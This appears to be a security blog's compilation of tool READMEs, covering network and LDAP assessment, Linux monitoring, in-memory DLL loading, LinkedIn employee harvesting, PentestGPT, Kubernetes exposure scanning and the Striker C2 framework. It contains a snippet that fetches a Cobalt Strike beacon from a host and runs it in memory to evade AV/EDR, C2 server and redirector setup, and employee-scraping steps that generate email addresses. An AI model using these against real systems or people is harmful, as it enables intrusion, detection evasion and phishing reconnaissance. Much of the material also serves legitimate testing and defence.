
Network_Assessment - With Wireshark Or TCPdump, You Can Determine Whether There Is Harmful Activity On Your Network Traffic That You Have Recorded On The Network You Monitor

By: Zion3R


With Wireshark or TCPdump, you can determine whether there is harmful activity in network traffic you have captured on the network you monitor.

This Python script analyzes network traffic in a given .pcap file and attempts to detect the following suspicious network activities and attacks:

  1. DNS Tunneling
  2. SSH Tunneling
  3. TCP Session Hijacking
  4. SMB Attack
  5. SMTP or DNS Attack
  6. IPv6 Fragmentation Attack
  7. TCP RST Attack
  8. SYN Flood Attack
  9. UDP Flood Attack
  10. Slowloris Attack

The script also tries to detect packets containing suspicious keywords (e.g., "password", "login", "admin"). Detected suspicious activities and attacks are displayed to the user in the console.

The main functions are:

  • get_user_input(): Gets the path of the .pcap file from the user.
  • get_all_ip_addresses(capture): Returns a set containing all source and destination IP addresses.
  • detect_* functions: Used to detect specific attacks and suspicious activities.
  • main(): Performs the main operations of the script. First, it gets the path of the .pcap file from the user, and then analyzes the file to try to detect the specified attacks and suspicious activity.
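For illustration, here is a minimal sketch of what get_all_ip_addresses() might look like, assuming the script parses the capture with pyshark (an assumption; the actual implementation may differ):

import pyshark

def get_all_ip_addresses(capture):
    # Collect every source and destination IPv4 address seen in the capture.
    addresses = set()
    for packet in capture:
        if hasattr(packet, 'ip'):
            addresses.add(packet.ip.src)
            addresses.add(packet.ip.dst)
    return addresses

capture = pyshark.FileCapture('/root/Desktop/TCP_RST_Attack.pcap')
print(get_all_ip_addresses(capture))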

How to Install Script?

git clone https://github.com/alperenugurlu/Network_Assessment.git

pip3 install -r requirements.txt

How to Run the Script?

python3 Network_Compromise_Assessment.py

Please enter the path to the .pcap or .pcapng file: /root/Desktop/TCP_RST_Attack.pcap (Example)

Script Creator

Alperen Ugurlu

Social Media:

https://www.linkedin.com/in/alperen-ugurlu-7b57b7178/



Golddigger - Search Files For Gold

By: Zion3R


Gold Digger is a simple tool used to help quickly discover sensitive information in files recursively. Originally written to assist in rapidly searching files obtained during a penetration test.


Installation

Gold Digger requires Python3.

virtualenv -p python3 .
source bin/activate
python dig.py --help

Usage

usage: dig.py [-h] [-e EXCLUDE] [-g GOLD] -d DIRECTORY [-r RECURSIVE] [-l LOG]

optional arguments:
-h, --help show this help message and exit
-e EXCLUDE, --exclude EXCLUDE
JSON file containing extension exclusions
-g GOLD, --gold GOLD JSON file containing the gold to search for
-d DIRECTORY, --directory DIRECTORY
Directory to search for gold
-r RECURSIVE, --recursive RECURSIVE
Search directory recursively?
-l LOG, --log LOG Log file to save output

Example Usage

Gold Digger will recursively go through all folders and files in search of content matching items listed in the gold.json file. Additionally, you can leverage an exclusion file called exclusions.json for skipping files matching specific extensions. Provide the root folder as the --directory flag.
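Conceptually, the search boils down to walking the directory tree and applying a set of regexes to each file. A minimal sketch of the idea (illustrative patterns and exclusions only, not GoldDigger's actual code or JSON schema):

import os
import re

GOLD_PATTERNS = [re.compile(p) for p in (r"password\s*=", r"api[_-]?key")]  # illustrative
EXCLUDED_EXTENSIONS = {".png", ".jpg", ".zip"}  # illustrative

def dig(root):
    # Walk the tree, skip excluded extensions, and report matching lines.
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if os.path.splitext(name)[1].lower() in EXCLUDED_EXTENSIONS:
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, errors="ignore") as fh:
                    for lineno, line in enumerate(fh, 1):
                        if any(p.search(line) for p in GOLD_PATTERNS):
                            print(f"{path}:{lineno}: {line.strip()}")
            except OSError:
                pass

dig(os.path.expanduser("~/Engagements/CustomerName/data/"))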

An example structure could be:

~/Engagements/CustomerName/data/randomfiles/
~/Engagements/CustomerName/data/randomfiles2/
~/Engagements/CustomerName/data/code/

You would provide the following command to parse all three directories:

python dig.py --gold gold.json --exclude exclusions.json --directory ~/Engagements/CustomerName/data/ --log Customer_2022-123_gold.log

Results

The tool will create a log file containing the scanning results. Due to the nature of using regular expressions, there may be numerous false positives. Despite this, the tool has been proven to increase productivity when processing thousands of files.

Shout-outs

Shout out to @d1vious for releasing git-wild-hunt https://github.com/d1vious/git-wild-hunt! Most of the regexes in GoldDigger come from this amazing project.



msLDAPDump - LDAP Enumeration Tool

By: Zion3R


msLDAPDump simplifies LDAP enumeration in a domain environment by wrapping the ldap3 library from Python in an easy-to-use interface. Like most of my tools, this one works best on Windows. If using Unix, the tool currently will not resolve hostnames that are not accessible via eth0.


Binding Anonymously

Users can bind to LDAP anonymously through the tool and dump basic information about LDAP, including domain naming context, domain controller hostnames, and more.
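As a rough illustration of what an anonymous bind looks like with ldap3 (the hostname is hypothetical, and msLDAPDump's own code may differ):

from ldap3 import Server, Connection, ALL

server = Server("dc01.example.local", get_info=ALL)  # hypothetical domain controller
conn = Connection(server)  # no credentials supplied: anonymous bind
if conn.bind():
    # When allowed, the server advertises its naming contexts even to
    # anonymous binds, which is what the basic dump relies on.
    print(server.info.naming_contexts)
    conn.unbind()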

Credentialed Bind

Users can bind to LDAP utilizing valid user account credentials or a valid NTLM hash. Using credentials will obtain the same information as the anonymous bind, as well as checking for the following:
  • Subnet scan for systems with ports 389 and 636 open
  • Basic Domain Info (Current user permissions, domain SID, password policy, machine account quota)
  • Users
  • Groups
  • Kerberoastable Accounts
  • ASREPRoastable Accounts
  • Constrained Delegation
  • Unconstrained Delegation
  • Computer Accounts - will also attempt DNS lookups on the hostname to identify IP addresses
  • Identify Domain Controllers
  • Identify Servers
  • Identify Deprecated Operating Systems
  • Identify MSSQL Servers
  • Identify Exchange Servers
  • Group Policy Objects (GPO)
  • Passwords in User description fields

Each check outputs the raw contents to a text file, and an abbreviated, cleaner version of the results in the terminal environment. The results in the terminal are pulled from the individual text files.

To-Do

  • Add support for LDAPS (LDAP Secure)
  • NTLM Authentication
  • Figure out why Unix only allows one adapter to make a call out to the LDAP server (removed resolution from Linux until resolved)
  • Add support for querying child domain information (currently does not respond nicely to querying child domain controllers)
  • Figure out how to link the name to the Description field dump at the end of the script
  • Implement command line options rather than inputs
  • Check for deprecated operating systems in the domain

Mandatory Disclaimer

Please keep in mind that this tool is meant for ethical hacking and penetration testing purposes only. I do not condone any behavior that would include testing targets that you do not currently have permission to test against.



LSMS - Linux Security And Monitoring Scripts

By: Zion3R

These are a collection of security and monitoring scripts you can use to monitor your Linux installation for security-related events or for an investigation. Each script works on its own and is independent of the other scripts. The scripts can be set up to either print out their results, send them to you via mail, or use AlertR as a notification channel.


Repository Structure

The scripts are located in the directory scripts/. Each script contains a short summary in the header of the file with a description of what it is supposed to do, (if needed) dependencies that have to be installed and (if available) references to where the idea for this script stems from.

Each script has a configuration file in the scripts/config/ directory to configure it. If the configuration file was not found during the execution of the script, the script will fall back to default settings and print out the results. Hence, it is not necessary to provide a configuration file.

The scripts/lib/ directory contains code that is shared between different scripts.

Scripts using a monitor_ prefix hold a state and are only useful for monitoring purposes. A single usage of them for an investigation will only show the current state of the Linux system, not changes that might be relevant for the system's security. If you want to establish the current state of your system as benign for these scripts, you can provide the --init argument.
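A minimal sketch of this monitor_ pattern (illustrative only, with a hypothetical state-file location; not an actual LSMS script):

import hashlib
import json
import os
import sys

WATCHED_FILE = "/etc/passwd"
STATE_FILE = "/var/lib/lsms_example_state.json"  # hypothetical location

def file_hash(path):
    with open(path, "rb") as fh:
        return hashlib.sha256(fh.read()).hexdigest()

current = file_hash(WATCHED_FILE)

if "--init" in sys.argv or not os.path.exists(STATE_FILE):
    # Establish the current (assumed benign) state.
    with open(STATE_FILE, "w") as fh:
        json.dump({"hash": current}, fh)
else:
    with open(STATE_FILE) as fh:
        stored = json.load(fh)["hash"]
    if stored != current:
        print(f"ALERT: {WATCHED_FILE} changed since the last run.")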

Usage

Take a look at the header of the script you want to execute. It contains a short description of what the script is supposed to do and what requirements are needed (if any are needed at all). If requirements are needed, install them before running the script.

The shared configuration file scripts/config/config.py contains settings that are used by all scripts. Furthermore, each script can be configured by using the corresponding configuration file in the scripts/config/ directory. If no configuration file was found, a default setting is used and the results are printed out.

Finally, you can run all configured scripts by executing start_search.py (which is located in the main directory) or by executing each script manually. A Python3 interpreter is needed to run the scripts.

Monitoring

If you want to use the scripts to monitor your Linux system constantly, you have to perform the following steps:

  1. Set up a notification channel that is supported by the scripts (currently printing out, mail, or AlertR).

  2. Configure the scripts that you want to run using the configuration files in the scripts/config/ directory.

  3. Execute start_search.py with the --init argument to initialize the scripts with the monitor_ prefix and let them establish a state of your system. However, this assumes that your system is currently uncompromised. If you are unsure of this, you should verify its current state.

  4. Set up a cron job as root user that executes start_search.py (e.g., 0 * * * * root /opt/LSMS/start_search.py to start the search hourly).

List of Scripts

Name                                                         Script
Monitoring cron files                                        monitor_cron.py
Monitoring /etc/hosts file                                   monitor_hosts_file.py
Monitoring /etc/ld.so.preload file                           monitor_ld_preload.py
Monitoring /etc/passwd file                                  monitor_passwd.py
Monitoring modules                                           monitor_modules.py
Monitoring SSH authorized_keys files                         monitor_ssh_authorized_keys.py
Monitoring systemd unit files                                monitor_systemd_units.py
Search executables in /dev/shm                               search_dev_shm.py
Search fileless programs (memfd_create)                      search_memfd_create.py
Search hidden ELF files                                      search_hidden_exe.py
Search immutable files                                       search_immutable_files.py
Search kernel thread impersonations                          search_non_kthreads.py
Search processes started by a now-disconnected SSH session   search_ssh_leftover_processes.py
Search running deleted programs                              search_deleted_exe.py
Test script to check if alerting works                       test_alert.py
Verify integrity of installed .deb packages                  verify_deb_packages.py


PythonMemoryModule - Pure-Python Implementation Of MemoryModule Technique To Load Dll And Unmanaged Exe Entirely From Memory

By: Zion3R


"Python memory module" AI generated pic - hotpot.ai


Pure-python implementation of the MemoryModule technique to load a dll or unmanaged exe entirely from memory.

What is it

PythonMemoryModule is a Python ctypes porting of the MemoryModule technique originally published by Joachim Bauch. It can load a dll or unmanaged exe using Python without requiring the use of an external library (pyd). It leverages pefile to parse PE headers, and ctypes to perform the in-memory loading.

The tool was originally conceived as a Pyramid module to provide evasion against AV/EDR by loading dll/exe payloads in python.exe entirely from memory; however, other use-cases are possible (IP protection, in-memory loading of pyds, spinoffs for other stealthier techniques), so I decided to create a dedicated repo.


Why it can be useful

  1. It basically allows using the MemoryModule technique entirely in the interpreted Python language, enabling the loading of a dll from a memory buffer using the stock signed python.exe binary, without dropping external code/libraries on disk (such as pymemorymodule bindings) that can be flagged by AV/EDRs or raise the user's suspicion.
  2. Using the MemoryModule technique in compiled-language loaders would require embedding MemoryModule code within the loaders themselves. This can be avoided by using the interpreted Python language and PythonMemoryModule, since the code can be executed dynamically and in memory.
  3. You can get some level of Intellectual Property protection by dynamically downloading, decrypting and loading (in memory) dlls that should be hidden from prying eyes. Bear in mind that the dlls can still be recovered from memory and reverse-engineered, but at least it would require some more effort by the attacker.
  4. You can load a stageless payload dll without performing injection or shellcode execution. The loading process mimics the LoadLibrary Windows API (which takes a path on disk as input) without actually calling it, operating in memory instead.

How to use it

In the following example a Cobalt Strike stageless beacon dll is downloaded (not saved on disk), loaded in memory and started by calling the entrypoint.

import urllib.request
import ctypes
import pythonmemorymodule
request = urllib.request.Request('http://192.168.1.2/beacon.dll')
result = urllib.request.urlopen(request)
buf=result.read()
dll = pythonmemorymodule.MemoryModule(data=buf, debug=True)
startDll = dll.get_proc_addr('StartW')
assert startDll()
#dll.free_library()

Note: if you use staging in your malleable profile the dll would not be able to load with LoadLibrary, hence MemoryModule won't work.

How to detect it

Using the MemoryModule technique will mostly respect the sections' permissions of the target DLL and avoid the noisy RWX approach. However, within the program memory there will be a private commit not backed by a DLL on disk, and this is a MemoryModule telltale.
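To make the telltale concrete, here is a hedged, Windows-only sketch that walks the current process's address space with VirtualQuery and flags executable private commits (a simplified illustration of the idea, not a detection product):

import ctypes
from ctypes import wintypes

class MEMORY_BASIC_INFORMATION(ctypes.Structure):
    _fields_ = [
        ("BaseAddress", ctypes.c_void_p),
        ("AllocationBase", ctypes.c_void_p),
        ("AllocationProtect", wintypes.DWORD),
        ("RegionSize", ctypes.c_size_t),
        ("State", wintypes.DWORD),
        ("Protect", wintypes.DWORD),
        ("Type", wintypes.DWORD),
    ]

MEM_COMMIT, MEM_PRIVATE = 0x1000, 0x20000
EXECUTE_PROTECTIONS = {0x10, 0x20, 0x40, 0x80}  # PAGE_EXECUTE* values

kernel32 = ctypes.windll.kernel32
mbi = MEMORY_BASIC_INFORMATION()
addr = 0
while kernel32.VirtualQuery(ctypes.c_void_p(addr), ctypes.byref(mbi), ctypes.sizeof(mbi)):
    if mbi.State == MEM_COMMIT and mbi.Type == MEM_PRIVATE and mbi.Protect in EXECUTE_PROTECTIONS:
        print(f"executable private commit at {mbi.BaseAddress:#x} ({mbi.RegionSize:#x} bytes)")
    addr = (mbi.BaseAddress or 0) + mbi.RegionSize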

Future improvements

  1. add support for argument parsing.
  2. add support (basic) for .NET assemblies execution.


LinkedInDumper - Tool To Dump Company Employees From LinkedIn API

By: Zion3R

Python 3 script to dump company employees from LinkedIn API

Description

LinkedInDumper is a Python 3 script that dumps employee data from the LinkedIn social networking platform.

The results contain firstname, lastname, position (title), location and a user's profile link. Only 2 API calls are required to retrieve all employees if the company does not have more than 10 employees. Otherwise, we have to paginate through the API results. With the --email-format CLI flag one can define a Python string format to auto-generate email addresses based on the retrieved first and last name.


Requirements

LinkedInDumper talks to the unofficial LinkedIn Voyager API, which requires authentication. Therefore, you must have a valid LinkedIn user account. To keep it simple, LinkedInDumper just expects a cookie value provided by you. Doing it this way, even 2FA-protected accounts are supported. Furthermore, you must provide a LinkedIn company URL to dump employees from.

Retrieving LinkedIn Cookie

  1. Sign into www.linkedin.com and retrieve your li_at session cookie value e.g. via developer tools
  2. Specify the cookie value either persistently in the python script's variable li_at or temporarily during runtime via the CLI flag --cookie

Retrieving LinkedIn Company URL

  1. Search your target company on Google Search or directly on LinkedIn
  2. The LinkedIn company URL should look something like this: https://www.linkedin.com/company/apple

Usage

usage: linkedindumper.py [-h] --url <linkedin-url> [--cookie <cookie>] [--quiet] [--include-private-profiles] [--email-format EMAIL_FORMAT]

options:
-h, --help show this help message and exit
--url <linkedin-url> A LinkedIn company url - https://www.linkedin.com/company/<company>
--cookie <cookie> LinkedIn 'li_at' session cookie
--quiet Show employee results only
--include-private-profiles
Show private accounts too
--email-format Python string format for emails; for example:
[1] john.doe@example.com > '{0}.{1}@example.com'
[2] j.doe@example.com > '{0[0]}.{1}@example.com'
[3] jdoe@example.com > '{0[0]}{1}@example.com'
[4] doe@example.com > '{1}@example.com'
[5] john@example.com > '{0}@example.com'
[6] jd@example.com > '{0[0]}{1[0]}@example.com'
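The mapping is plain Python str.format, with {0} bound to the first name and {1} to the last name; for example:

first, last = "john", "doe"
for fmt in ("{0}.{1}@example.com", "{0[0]}.{1}@example.com", "{0[0]}{1[0]}@example.com"):
    print(fmt.format(first, last))
# john.doe@example.com
# j.doe@example.com
# jd@example.com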

Example 1 - Docker Run

docker run --rm l4rm4nd/linkedindumper:latest --url 'https://www.linkedin.com/company/apple' --cookie <cookie> --email-format '{0}.{1}@apple.de'

Example 2 - Native Python

# install dependencies
pip install -r requirements.txt

python3 linkedindumper.py --url 'https://www.linkedin.com/company/apple' --cookie <cookie> --email-format '{0}.{1}@apple.de'

Outputs

The script will return employee data as semi-colon separated values (like CSV):

[LinkedInDumper ASCII-art banner, by LRVT]

[i] Company Name: apple
[i] Company X-ID: 162479
[i] LN Employees: 1000 employees found
[i] Dumping Date: 17/10/2022 13:55:06
[i] Email Format: {0}.{1}@apple.de
Firstname;Lastname;Email;Position;Gender;Location;Profile
Katrin;Honauer;katrin.honauer@apple.com;Software Engineer at Apple;N/A;Heidelberg;https://www.linkedin.com/in/katrin-honauer
Raymond;Chen;raymond.chen@apple.com;Recruiting at Apple;N/A;Austin, Texas Metropolitan Area;https://www.linkedin.com/in/raytherecruiter

[i] Successfully crawled 2 unique apple employee(s). Hurray ^_-

Limitations

LinkedIn will only return the first 1,000 search results when harvesting contact information. You may also need a LinkedIn premium account when you have reached the maximum allowed queries for visiting profiles with your freemium LinkedIn account.

Furthermore, not all employee profiles are public. The results vary depending on the LinkedIn account you use and whether you are connected with some employees of the company to crawl. Therefore, it is sometimes not possible to retrieve the firstname, lastname and profile URL of some employee accounts. The script will not display such profiles, as they contain default values such as "LinkedIn" as firstname and "Member" as lastname. If you want to include such private profiles, please use the CLI flag --include-private-profiles. Although some accounts may be private, we can obtain the position (title) as well as the location of such accounts. Only firstname, lastname and profile URL are hidden for private LinkedIn accounts.

Finally, LinkedIn users are free to name their profile however they like. An account name can therefore contain various things such as salutations, abbreviations, emojis, middle names etc. I tried my best to remove some nonsense. However, this is not a complete solution to the general problem. Note that we are not using the official LinkedIn API. This script gathers information from the "unofficial" Voyager API.



PentestGPT - A GPT-empowered Penetration Testing Tool

By: Zion3R


A GPT-empowered penetration testing tool.

Common Questions

  • Q: What is PentestGPT?
    • A: PentestGPT is a penetration testing tool empowered by ChatGPT. It is designed to automate the penetration testing process. It is built on top of ChatGPT and operates in an interactive mode to guide penetration testers in both overall progress and specific operations.
  • Q: Do I need to be a ChatGPT Plus member to use PentestGPT?
    • A: Yes. PentestGPT relies on the GPT-4 model for high-quality reasoning. Since there is no public GPT-4 API yet, a wrapper is included to use a ChatGPT session to support PentestGPT. You may also use the GPT-4 API directly if you have access to it.
  • Q: Why GPT-4?
    • A: After empirical evaluation, we found that GPT-4 performs better than GPT-3.5 in terms of penetration testing reasoning. In fact, GPT-3.5 leads to failed tests even in simple tasks.
  • Q: Why not just use GPT-4 directly?
    • A: We found that GPT-4 suffers from loss of context as the test goes deeper. It is essential to maintain a "test status awareness" in this process. You may check the PentestGPT design here for more details.
  • Q: What about AutoGPT?
    • A: AutoGPT is not designed for pentesting. It may perform malicious operations. Due to this consideration, we designed PentestGPT in an interactive mode. Of course, our end goal is an automated pentest solution.
  • Q: Future plans?
    • A: We're working on a paper to explore the technical details behind automated pentesting. Meanwhile, please feel free to raise issues/discussions. I'll do my best to address all of them.

Getting Started

  • PentestGPT is a penetration testing tool empowered by ChatGPT.
  • It is designed to automate the penetration testing process. It is built on top of ChatGPT and operates in an interactive mode to guide penetration testers in both overall progress and specific operations.
  • PentestGPT is able to solve easy to medium HackTheBox machines and other CTF challenges. You can check this example in resources, where we use it to solve the HackTheBox challenge TEMPLATED (web challenge).
  • A sample testing process of PentestGPT on a target VulnHub machine (Hackable II) is available here.
  • A sample usage video is below: (or available here: Demo)

Installation

Before installation, we recommend taking a look at this installation video if you want to use the cookie setup.

  1. Install requirements.txt with pip install -r requirements.txt
  2. Configure the cookies in config. You may follow a sample by cp config/chatgpt_config_sample.py config/chatgpt_config.py.
    • If you're using cookie, please watch this video: https://youtu.be/IbUcj0F9EBc. The general steps are:
      • Login to ChatGPT session page.
      • In Inspect - Network, find the connections to the ChatGPT session page.
      • Find the cookie in the request header in the request to https://chat.openai.com/api/auth/session and paste it into the cookie field of config/chatgpt_config.py. (You may use Inspect->Network, find session and copy the cookie field in request_headers to https://chat.openai.com/api/auth/session)
      • Note that the other fields are temporarily deprecated due to the update of ChatGPT page.
      • Fill in userAgent with your user agent.
    • If you're using API:
      • Fill in the OpenAI API key in chatgpt_config.py.
  3. To verify that the connection is configured properly, you may run python3 test_connection.py. You should see some sample conversation with ChatGPT.
    • A sample output is below
    1. You're connected with ChatGPT Plus cookie. 
    To start PentestGPT, please use <python3 main.py --reasoning_model=gpt-4>
    ## Test connection for OpenAI api (GPT-4)
    2. You're connected with OpenAI API. You have GPT-4 access. To start PentestGPT, please use <python3 main.py --reasoning_model=gpt-4 --useAPI>
    ## Test connection for OpenAI api (GPT-3.5)
    3. You're connected with OpenAI API. You have GPT-3.5 access. To start PentestGPT, please use <python3 main.py --reasoning_model=gpt-3.5-turbo --useAPI>
  4. (Notice) The above verification process applies to the cookie setup. If you encounter errors after several trials, please try to refresh the page, repeat the above steps, and try again. You may also try with the cookie to https://chat.openai.com/backend-api/conversations. Please submit an issue if you encounter any problem.

Usage

  1. To start, run python3 main.py --args.
    • --reasoning_model is the reasoning model you want to use.
    • --useAPI is whether you want to use OpenAI API.
    • You're recommended to use the combination as suggested by test_connection.py, which are:
      • python3 main.py --reasoning_model=gpt-4
      • python3 main.py --reasoning_model=gpt-4 --useAPI
      • python3 main.py --reasoning_model=gpt-3.5-turbo --useAPI
  2. The tool works similarly to msfconsole. Follow the guidance to perform penetration testing.
  3. In general, PentestGPT takes commands similar to ChatGPT. There are several basic commands.
    1. The commands are:
      • help: show the help message.
      • next: key in the test execution result and get the next step.
      • more: let PentestGPT explain more details of the current step. Also, a new sub-task solver will be created to guide the tester.
      • todo: show the todo list.
      • discuss: discuss with the PentestGPT.
      • google: search on Google. This function is still under development.
      • quit: exit the tool and save the output as log file (see the reporting section below).
    2. You can use <SHIFT + right arrow> to end your input (ENTER is for the next line).
    3. You may always use TAB to autocomplete the commands.
    4. When you're given a drop-down selection list, you can use cursor or arrow key to navigate the list. Press ENTER to select the item. Similarly, use <SHIFT + right arrow> to confirm selection.
  4. In the sub-task handler initiated by more, users can execute more commands to investigate a specific problem:
    1. The commands are:
      • help: show the help message.
      • brainstorm: let PentestGPT brainstorm on the local task for all the possible solutions.
      • discuss: discuss with PentestGPT about this local task.
      • google: search on Google. This function is still under development.
      • continue: exit the subtask and continue the main testing session.

Report and Logging

  1. After finishing the penetration testing, a report will be automatically generated in the logs folder (if you quit with the quit command).
  2. The report can be printed in a human-readable format by running python3 utils/report_generator.py <log file>. A sample report sample_pentestGPT_log.txt is also uploaded.

Contributing

Contributions are what make the open source community such an amazing place to learn, inspire, and create. Any contributions you make are greatly appreciated.

If you have a suggestion that would make this better, please fork the repo and create a pull request. You can also simply open an issue with the tag "enhancement". Don't forget to give the project a star! Thanks again!

  1. Fork the Project
  2. Create your Feature Branch (git checkout -b feature/AmazingFeature)
  3. Commit your Changes (git commit -m 'Add some AmazingFeature')
  4. Push to the Branch (git push origin feature/AmazingFeature)
  5. Open a Pull Request

License

Distributed under the MIT License. See LICENSE.txt for more information.

Contact

Gelei Deng - gelei.deng@ntu.edu.sg



KubeStalk - Discovers Kubernetes And Related Infrastructure Based Attack Surface From A Black-Box Perspective



KubeStalk is a tool to discover Kubernetes and related infrastructure based attack surface from a black-box perspective. This tool is a community version of the tool used to probe for unsecured Kubernetes clusters around the internet during Project Resonance - Wave 9.


Usage

The GIF below demonstrates usage of the tool:


Installation

KubeStalk is written in Python and requires the requests library.

To install the tool, you can clone the repository to any directory:

git clone https://github.com/redhuntlabs/kubestalk

Once cloned, you need to install the requests library using python3 -m pip install requests or:

python3 -m pip install -r requirements.txt

Everything is set up and you can use the tool directly.

Command-line Arguments

A list of command line arguments supported by the tool can be displayed using the -h flag.

$ python3 kubestalk.py  -h

+---------------------+
| K U B E S T A L K |
+---------------------+ v0.1

[!] KubeStalk by RedHunt Labs - A Modern Attack Surface (ASM) Management Company
[!] Author: 0xInfection (RHL Research Team)
[!] Continuously Track Your Attack Surface using https://redhuntlabs.com/nvadr.

usage: ./kubestalk.py <url(s)>/<cidr>

Required Arguments:
urls List of hosts to scan

Optional Arguments:
-o OUTPUT, --output OUTPUT
Output path to write the CSV file to
-f SIG_FILE, --sig-dir SIG_FILE
Signature directory path to load
-t TIMEOUT, --timeout TIMEOUT
HTTP timeout value in seconds
-ua USER_AGENT, --user-agent USER_AGENT
User agent header to set in HTTP requests
--concurrency CONCURRENCY
No. of hosts to process simultaneously
--verify-ssl Verify SSL certificates
--version Display the version of KubeStalk and exit.

Basic Usage

To use the tool, you can pass one or more hosts to the script. All targets passed to the tool must be RFC 3986 compliant, i.e. they must contain a scheme and hostname (and port if required).

A basic usage is as below:

$ python3 kubestalk.py https://███.██.██.███:10250

+---------------------+
| K U B E S T A L K |
+---------------------+ v0.1

[!] KubeStalk by RedHunt Labs - A Modern Attack Surface (ASM) Management Company
[!] Author: 0xInfection (RHL Research Team)
[!] Continuously Track Your Attack Surface using https://redhuntlabs.com/nvadr.

[+] Loaded 10 signatures to scan.
[*] Processing host: https://███.██.██.██:10250
[!] Found potential issue on https://███.██.██.██:10250: Kubernetes Pod List Exposure
[*] Writing results to output file.
[+] Done.
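Each signature effectively boils down to an HTTP probe against a known path plus a match on the response. A simplified, hedged illustration of the pod-list check above (not KubeStalk's actual signature format; the target is a placeholder):

import requests
import urllib3

urllib3.disable_warnings()  # the probe deliberately tolerates self-signed certs

def check_pod_exposure(base_url, timeout=5):
    # An endpoint that answers /pods with a PodList object is leaking workload details.
    resp = requests.get(f"{base_url}/pods", timeout=timeout, verify=False)
    return resp.status_code == 200 and "PodList" in resp.text

print(check_pod_exposure("https://203.0.113.10:10250"))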

HTTP Tuning

HTTP requests can be fine-tuned using the -t (to set the HTTP timeout), -ua (to specify a custom user agent) and --verify-ssl (to validate SSL certificates while making requests) flags.

Concurrency

You can control the number of hosts to scan simultaneously using the --concurrency flag. The default value is set to 5.

Output

The output is written to a CSV file and can be controlled by the --output flag.

A sample of the CSV output rendered in markdown is as below:

| host | path | issue | type | severity |
|------|------|-------|------|----------|
| https://█.█.█.█:10250 | /pods | Kubernetes Pod List Exposure | core-component | vulnerability/misconfiguration |
| https://█.█.█.█:443 | /api/v1/pods | Kubernetes Pod List Exposure | core-component | vulnerability/misconfiguration |
| http://█.█.██.█:80 | / | etcd Viewer Dashboard Exposure | add-on | vulnerability/exposure |
| http://██.██.█.█:80 | / | cAdvisor Metrics Web UI Dashboard Exposure | add-on | vulnerability/exposure |

Version & License

The tool is licensed under the BSD 3 Clause License and is currently at v0.1.

To know more about our Attack Surface Management platform, check out NVADR.



Striker - A Command And Control (C2)


Striker is a simple Command and Control (C2) program.


Disclaimer

This project is under active development. Most of the features are experimental, with more to come. Expect breaking changes.

Features

A) Agents

  • Native agents for linux and windows hosts.
  • Self-contained, minimal python agent should you ever need it.
  • HTTP(s) channels.
  • Asynchronous task execution.
  • Support for multiple redirectors, with fallback to others when the active one goes down.

B) Backend / Teamserver

  • Supports multiple operators.
  • Most features exposed through the REST API, making it easy to automate things.
  • Uses web sockets for faster comms.

C) User Interface

  • Smooth and reactive UI thanks to Svelte and SocketIO.
  • Easy to configure as it compiles into static HTML, JavaScript, and CSS files, which can be hosted with even the most basic web server you can find.
  • Teamchat feature to communicate with other operators over text.

Installing Striker

Clone the repo;

$ git clone https://github.com/4g3nt47/Striker.git
$ cd Striker

The codebase is divided into 4 independent sections;

1. The C2 Server / Backend

This handles all server-side logic for both operators and agents. It is a NodeJS application made with;

  • express - For the REST API.
  • socket.io - For Web Socket communtication.
  • mongoose - For connecting to MongoDB.
  • multer - For handling file uploads.
  • bcrypt - For hashing user passwords.

The source code is in the backend/ directory. To setup the server;

  1. Setup a MongoDB database;

Striker uses MongoDB as backend database to store all important data. You can install this locally on your machine using this guide for debian-based distros, or create a free one with MongoDB Atlas (A database-as-a-service platform).

  2. Move into the source directory;
$ cd backend
  3. Install dependencies;
$ npm install
  4. Create a directory for static files;
$ mkdir static

You can use this folder to host static files on the server. This should also be where your UPLOAD_LOCATION is set to in the .env file (more on this later), but this is not necessary. Files in this directory will be publicly accessible under the path /static/.

  5. Create a .env file;

NOTE: Values between < and > are placeholders. Replace them with appropriate values (including the <>). For fields that require random strings, you can generate them easily using;

$ head -c 100 /dev/urandom | sha256sum
DB_URL=<your MongoDB connection URL>
HOST=<host to listen on (default: 127.0.0.1)>
PORT=<port to listen on (default: 3000)>
SECRET=<random string to use for signing session cookies and encrypting session data>
ORIGIN_URL=<full URL of the server you will be hosting the frontend at. Used to setup CORS>
REGISTRATION_KEY=<random string to use for authentication during signup>
MAX_UPLOAD_SIZE=<max file upload size, in bytes>
UPLOAD_LOCATION=<directory to store uploaded files to (default: static)>
SSL_KEY=<your SSL key file (optional)>
SSL_CERT=<your SSL cert file (optional)>

Note that SSL_KEY and SSL_CERT are optional. If any is not defined, a plain HTTP server will be created. This helps avoid needless overhead when running the server behind an SSL-enabled reverse proxy on the same host.

  6. Start the server;
$ node index.js
[12:45:30 PM] Connecting to backend database...
[12:45:31 PM] Starting HTTP server...
[12:45:31 PM] Server started on port: 3000

2. The Frontend

This is the web UI used by operators. It is a single page web application written in Svelte, and the source code is in the frontend/ directory.

To setup the frontend;

  1. Move into the source directory;
$ cd frontend
  2. Install dependencies;
$ npm install
  3. Create a .env file with the variable VITE_STRIKER_API set to the full URL of the C2 server as configured above;
VITE_STRIKER_API=https://c2.striker.local
  4. Build;
$ npm run build

The above will compile everything into a static web application in dist/ directory. You can move all the files inside into the web root of your web server, or even host it with a basic HTTP server like that of python;

$ cd dist
$ python3 -m http.server 8000
  5. Signup;
  • Open the site in a web browser. You should see a login page.
  • Click on the Register button.
  • Enter a username, password, and the registration key in use (see REGISTRATION_KEY in backend/.env)

This will create a standard user account. You will need an admin account to access some features. Your first admin account must be created manually, afterwards you can upgrade and downgrade other accounts in the Users tab of the web UI.

To create your first admin account;

  • Connect to the MongoDB database used by the backend.
  • Update the users collection and set the admin field of the target user to true;

There are different ways you can do this. If you have mongo available in your CLI, you can do it using;

$ mongo <your MongoDB connection URL>
> db.users.updateOne({username: "<your username>"}, {$set: {admin: true}})

You should get the following response if it works;

{ "acknowledged" : true, "matchedCount" : 1, "modifiedCount" : 1 }

You can now login :)

3. The C2 Redirector

A) Dumb Pipe Redirection

A dumb pipe redirector written for Striker is available at redirector/redirector.py. Obviously, this will only work for plain HTTP traffic, or for HTTPS when SSL verification is disabled (you can do this by enabling the INSECURE_SSL macro in the C agent).

The following example listens on port 443 on all interfaces and forwards to c2.example.org on port 443;

$ cd redirector
$ ./redirector.py 0.0.0.0:443 c2.example.org:443
[*] Starting redirector on 0.0.0.0:443...
[+] Listening for connections...
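For intuition, a dumb pipe is nothing more than bidirectional byte shuttling between the connecting agent and the upstream C2. A minimal sketch of the concept (not redirector.py itself):

import socket
import threading

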